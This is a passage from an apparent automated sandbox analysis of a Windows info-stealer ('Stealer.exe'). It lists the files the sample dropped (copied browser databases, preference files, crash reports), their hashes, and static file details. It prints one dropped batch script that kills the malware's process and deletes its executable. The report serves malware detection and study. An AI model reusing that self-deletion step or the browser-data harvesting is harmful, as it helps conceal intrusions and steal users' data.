                                                                                              • 149.154.167.220
                                                                                              mjjt5kTb4o.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              122046760.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                              • 149.154.167.220
                                                                                              pkqLAMAv96.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                              • 149.154.167.220

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_zyEDYRU0jw.exe_69bb14e67bf623e7cd983b9932faed9719bbef3_4770cf9e_930ab4e2-6669-4043-9895-101ff69f2bcf\Report.wer

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):65536
                                                                                              Entropy (8bit):1.4688091813513664
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:XFXTXipENEe+mWbk6Inauou7vCH28/k+QbOdDu76rfAIO8gH:NQEfWbk9asDCzsZKDu76rfAIO8o
                                                                                              MD5:34D677545093F7A6C20E22C905AEEFDD
                                                                                              SHA1:FB3D13B16D944D9488B1885A4C583A0FA7836AB9
                                                                                              SHA-256:4AAE1BA0E29A37278D822369794B85A5118626D5B654F45E4CB027C67F594F0B
                                                                                              SHA-512:2B1248BBC7B5091CB4204F4C5BCA2E4E2DB090AA3D6CBA4B034AECAB2A34A90D66C072DF8F384179868187B7025DE0ED6A11D42E1A4D78FDBE78C4DBDD48E6BB
                                                                                              Malicious:true
                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.9.3.5.2.8.8.9.2.3.5.8.0.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.9.3.5.2.8.9.5.0.1.6.0.9.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.3.0.a.b.4.e.2.-.6.6.6.9.-.4.0.4.3.-.9.8.9.5.-.1.0.1.f.f.6.9.f.2.b.c.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.e.5.f.0.6.9.d.-.8.b.2.f.-.4.a.7.4.-.b.a.8.7.-.0.3.f.7.a.7.1.6.7.a.4.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.z.y.E.D.Y.R.U.0.j.w...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.t.e.a.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.a.c.-.0.0.0.1.-.0.0.5.0.-.7.0.3.a.-.2.f.1.d.b.5.5.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.d.9.e.4.0.2.a.8.f.5.c.6.8.0.c.d.8.4.3.1.0.e.a.9.f.b.a.2.e.c.7.0.0.0.0.0.0.0.0.!.0.0.0.0.d.4.2.e.3.c.5.f.c.2.4.e.3.0.9.5.8.1.8.1.9.c.b.a.7.2.3.b.1.4.c.3.c.2.4.7.d.

                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER8074.tmp.dmp

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Tue Dec 17 18:54:49 2024, 0x1205a4 type
                                                                                              Category:dropped
                                                                                              Size (bytes):266339
                                                                                              Entropy (8bit):3.9546241866131155
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:LlqfT4I5/XRqRQqoE8MYeErJmFQcd/Pm4uEqwyjLTgIh:L8LP3qRQqoE8MYeErJmOqm4NyXTgM
                                                                                              MD5:D5852BD2F9F77EDA720D4CDCA228DDF1
                                                                                              SHA1:6111E1C52F8BEA6D4A7331BCEF9C27C3A30996BE
                                                                                              SHA-256:2D7ABB6D9280BEC2F438B2B084B0C2A8347E401E718A9B9CB988E9BFFE8BC206
                                                                                              SHA-512:3E9938BE1CEEA22E79DE95E969C25FEA85A51E570C3B8BD08F45A65202F244A62310C4DA8C35E5F34DADF8CF8674B792B66F2BCF1EA46FD6D136BF3BEFF5B226
                                                                                              Malicious:false
                                                                                              Preview:MDMP..a..... .........ag............4............0..H.......<...d7.......$..rK..........`.......8...........T...........X................7...........9..............................................................................bJ......$:......GenuineIntel...........T.............ag.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER81BD.tmp.WERInternalMetadata.xml

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):8358
                                                                                              Entropy (8bit):3.685387794341904
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:R9l7lZNi0kZ6M6YP7SU8kugmfZqqP7pDp89beRsfKqm:R9lnNix6M6YzSUcgmfPweKf+
                                                                                              MD5:F4B1CDDCEA5E8F9FB36C54C70C253FFE
                                                                                              SHA1:F6B85E3B1E888089756407331D8354832DE9D02C
                                                                                              SHA-256:78AE67A2E025D4D34DAC24009E66C653CA87065E43D0E94144F8583CAAF9D50A
                                                                                              SHA-512:236E12D51E7BD1298C8DD382C5C98936ED5080014B7DA509669701035C48CC29427456D7F2CDFBDC4CBA5E509A77CCF396E544B210A34259E8465EBFE96D89A2
                                                                                              Malicious:false
                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.5.2.4.<./.P.i.

                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER81ED.tmp.xml

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):4863
                                                                                              Entropy (8bit):4.488316587145011
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:cvIwwtl8zsTqe702I7VFJ5WS2CfjkHSs3rm8M4JmpMPFB+q8vrpMKLNegD5d:uILfTP7GySPfoJTKxLNegtd
                                                                                              MD5:A3B7F76DA68467BE42BD361B5DF317F3
                                                                                              SHA1:59AA872734C4625E686E2FB5FDB2DFF413B6433C
                                                                                              SHA-256:E23BEFC8E07D1CF39947DBA8369C0BEB1C073F9C66A9DE31DFE912248AD7850A
                                                                                              SHA-512:577E0A23BC5DFC02A07F81E106D58343821978FB1D1E20822BE322AA2ACE2F8A690FB5EB50C0DE5D61F50F7DA57398FC1FE386E4E1A6DDFBA4E18CAF625E70C6
                                                                                              Malicious:false
                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222979446" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

                                                                                              C:\Users\user\AppData\Local\Temp\h5d0oy2n.wjl

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):15119
                                                                                              Entropy (8bit):5.63468773874796
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:L9iIuERzA83h09RZxeI4bO8y8eIKf+qNV:gIuERzA83h09RZxwO8y8eIKfHNV
                                                                                              MD5:AFC16C019BBEB3904B37576B9179D9CD
                                                                                              SHA1:DBA86847FFE7AD2E887F1A51FBD464357850488D
                                                                                              SHA-256:8EEE2E854F6C97ADB60D3E4F2A7AB51CF1EFC387C672D950E609A4EBA1752748
                                                                                              SHA-512:752C02768963163D8D20219FEB7A83C2EEAC6C4B5E7F97B035815334B7BB6D327053FA089410BA6D2328B85B9A464F651945F60AD36BD822D1E54E31434C5875
                                                                                              Malicious:false
                                                                                              Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b

                                                                                              C:\Users\user\AppData\Local\Temp\tebd4kzb.yml

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):103985
                                                                                              Entropy (8bit):6.082865991437579
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:QJFxqXOHF+7gFajcCN5tTsxDxEM0pMtwGUFJ526GH1B1WAUt6+1NJsf:QxwOl+V95+xDxLqMtwGU2B1s6+/K
                                                                                              MD5:6DE273C47E7F54F2910BC516F886633B
                                                                                              SHA1:230A6D3F3510D1231BCDAD4F4BD843F1575A84A5
                                                                                              SHA-256:89545282AD73EE9D530E4BACEE9A2046322C767CB7564E8E12694F30CF8CDDEF
                                                                                              SHA-512:AB5488E0C9622FCC6F4610B0501E79EA87C1963480E8E9F217B46F94E7DDFD32FE0BED9D1329093C58F2D330A49E2D8468CDFD4C6CC8689590671B36F9504617
                                                                                              Malicious:false
                                                                                              Preview:{"accessibility":{"screen_ai":{"last_used_time":"13370432463378508"}},"autofill":{"ablation_seed":"f4fbGGU/iY4=","states_data_dir":"C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\AutofillStates\\2020.11.2.164946"},"background_tracing":{"session_state":{"privacy_filter":true,"state":0}},"breadcrumbs":{"enabled":false,"enabled_time":"13369750774825357"},"browser":{"default_browser_infobar_declined_count":1,"default_browser_infobar_last_declined_time":"13370432455860460","default_browser_prompt_refresh_study_group":"enabled-v2-arm-3","last_redirect_origin":"","last_whats_new_version":128,"shortcut_migration_version":"92.0.4515.159","whats_new_hats_activation_threshold":64},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"local":{"password_hash_data_list":[]},"management":{"platform"

                                                                                              C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):107
                                                                                              Entropy (8bit):5.240677851248881
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:HFTEOuMJcFKsoEByTAlwBRZDEXEPONy+WfVXbn:yOuMJNEByMlweonRdLn
                                                                                              MD5:EB26DD13244C0F7D083DD66112D54178
                                                                                              SHA1:3690C8F2613713B5B127CD41E6790D2CB4DC88C0
                                                                                              SHA-256:D90C444F8367652B9D78C407F021BF2B7B1A9E40A07F7D21AF0DDED22FC9A037
                                                                                              SHA-512:92E3EB0891D1C45CC8E6BAB52E1387494D3690B62905058BFBC07D73917A82B881E763585A3B382993321A232EBB6DE726695618EA7645E5B0984B740F38EC3E
                                                                                              Malicious:false
                                                                                              Preview:chcp 65001..TaskKill /F /IM 4524..Timeout /T 2 /Nobreak..Del /ah "C:\Users\user\Desktop\zyEDYRU0jw.exe"..

                                                                                              C:\Users\user\AppData\Local\Temp\tmp6172.tmp.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                              Category:dropped
                                                                                              Size (bytes):98304
                                                                                              Entropy (8bit):0.08231524779339361
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
                                                                                              MD5:886A5F9308577FDF19279AA582D0024D
                                                                                              SHA1:CDCCC11837CDDB657EB0EF6A01202451ECDF4992
                                                                                              SHA-256:BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
                                                                                              SHA-512:FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\tmp6173.tmp.tmpdb

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                              Category:dropped
                                                                                              Size (bytes):294912
                                                                                              Entropy (8bit):0.08434615749937499
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:2va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vPY:21zkVmvQhyn+Zoz67R
                                                                                              MD5:93BAA1B7500F3ADB16BE27FCB2E256A8
                                                                                              SHA1:77CB640557F5F7950B083405B4AEE0573D11D98F
                                                                                              SHA-256:7C24FE957EFB0DDF026ECDD88027BE5B40863342CF2CF2A5A7FF72062F75B1E9
                                                                                              SHA-512:C53D09227E5069924E49823CD6E93775B98439D57D279BEEFFE14EA057BF9D9882CE1BC297C0181D0309E027E7993F079D6BF4933A929D2C942903D28DB155AB
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................S`.....z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\tmp61B3.tmp.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 27, 1st free page 7, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 3
                                                                                              Category:dropped
                                                                                              Size (bytes):57344
                                                                                              Entropy (8bit):0.7310370201569906
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:qsvKLyeymO9K3PlGNxotxPUCbn8MouON3n:q86PlGNxss27e
                                                                                              MD5:A802F475CA2D00B16F45FEA728F2247C
                                                                                              SHA1:AF57C02DA108CFA0D7323252126CC87D7B608786
                                                                                              SHA-256:156ADDC0B949718CF518720E5774557B134CCF769A15E0413ABC257C80E58684
                                                                                              SHA-512:275704B399A1C236C730F4702B57320BD7F034DC234B7A820452F8C650334233BD6830798446664F133BA4C77AA2F91E66E901CE8A11BD8575C2CD08AB9BE98F
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\tmp61B4.tmp.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                              Category:dropped
                                                                                              Size (bytes):122880
                                                                                              Entropy (8bit):1.1414673161713362
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                                                              MD5:24937DB267D854F3EF5453E2E54EA21B
                                                                                              SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                                                              SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                                                              SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\tmp61B5.tmp.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                              Category:dropped
                                                                                              Size (bytes):122880
                                                                                              Entropy (8bit):1.1414673161713362
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                                                              MD5:24937DB267D854F3EF5453E2E54EA21B
                                                                                              SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                                                              SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                                                              SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\tmp61B6.tmp.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                              Category:dropped
                                                                                              Size (bytes):122880
                                                                                              Entropy (8bit):1.1414673161713362
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                                                              MD5:24937DB267D854F3EF5453E2E54EA21B
                                                                                              SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                                                              SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                                                              SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\tmp61E6.tmp.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 4, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 4
                                                                                              Category:dropped
                                                                                              Size (bytes):49152
                                                                                              Entropy (8bit):0.86528072116055
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:kTN7KLWlGxdKmtZeympbn8MouB6w9f/rrGMa:qVlGxdKN7Iw9fj
                                                                                              MD5:8CC409C8658C3F05143C1484A1719879
                                                                                              SHA1:909CDE14664C0E5F943764895E0A9DFEC7831FF5
                                                                                              SHA-256:BC69C3518DA2ABC8904F314F078D9672BAF3B840E09FD2B2E95D4B07A03A85A4
                                                                                              SHA-512:55D8923B6481ADF442817B7BAA50C36CBAD8DAC0EC600451813D29F4775DE519A06158A6233E61635CD0ED862E60AC7F50C75556C4E89D583D8A8A4299F1808F
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\tmp61E7.tmp.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3045002, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                              Category:dropped
                                                                                              Size (bytes):20480
                                                                                              Entropy (8bit):1.4026573159402624
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:TB9aw/aHLopFMavU1/iB8eVC+rQ88TkQqp8JHyDlEKw0esEieNp:1PareMa8K8eVC+rZ8TkQqpWSDlNufp
                                                                                              MD5:F49DFF163167A43F4940B7337A092C07
                                                                                              SHA1:1A8BAAC92537FA0BD39063D17C3072AD86190CC4
                                                                                              SHA-256:B3D38278030DBEA9D1CDDC177F9B6CB590CE1D383A88211B231402B7CA208CF3
                                                                                              SHA-512:BC7685763D70300FE2AE28803D9F886D91004F6045A995065FAAEB6A9DFCAB77E80B475516E9B4C1F8969E112E2B48C7E68FC2AB15F61BB69443A8C54E24066F
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................v.......@..g.....@....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\tmp61E8.tmp.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
                                                                                              Category:dropped
                                                                                              Size (bytes):135168
                                                                                              Entropy (8bit):1.0873605234887023
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
                                                                                              MD5:5B01CD9FA62FDF35D1A4587F2676CA31
                                                                                              SHA1:25BBFAC890114F4ECE0BF818F504FFE6102004B8
                                                                                              SHA-256:74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
                                                                                              SHA-512:A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\tmp61E9.tmp.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
                                                                                              Category:dropped
                                                                                              Size (bytes):135168
                                                                                              Entropy (8bit):1.0873605234887023
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
                                                                                              MD5:5B01CD9FA62FDF35D1A4587F2676CA31
                                                                                              SHA1:25BBFAC890114F4ECE0BF818F504FFE6102004B8
                                                                                              SHA-256:74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
                                                                                              SHA-512:A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\tmp61EA.tmp.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
                                                                                              Category:dropped
                                                                                              Size (bytes):135168
                                                                                              Entropy (8bit):1.0873605234887023
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
                                                                                              MD5:5B01CD9FA62FDF35D1A4587F2676CA31
                                                                                              SHA1:25BBFAC890114F4ECE0BF818F504FFE6102004B8
                                                                                              SHA-256:74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
                                                                                              SHA-512:A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Entropy (8bit):5.781938114168424
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                              File name:zyEDYRU0jw.exe
                                                                                              File size:171'008 bytes
                                                                                              MD5:41d3660b5321768122f4c25ac9868fc3
                                                                                              SHA1:d42e3c5fc24e309581819cba723b14c3c247d824
                                                                                              SHA256:c43a34e78ba6913551af41857fb63a3545acd6a9248e8a4de884988b3ccf895d
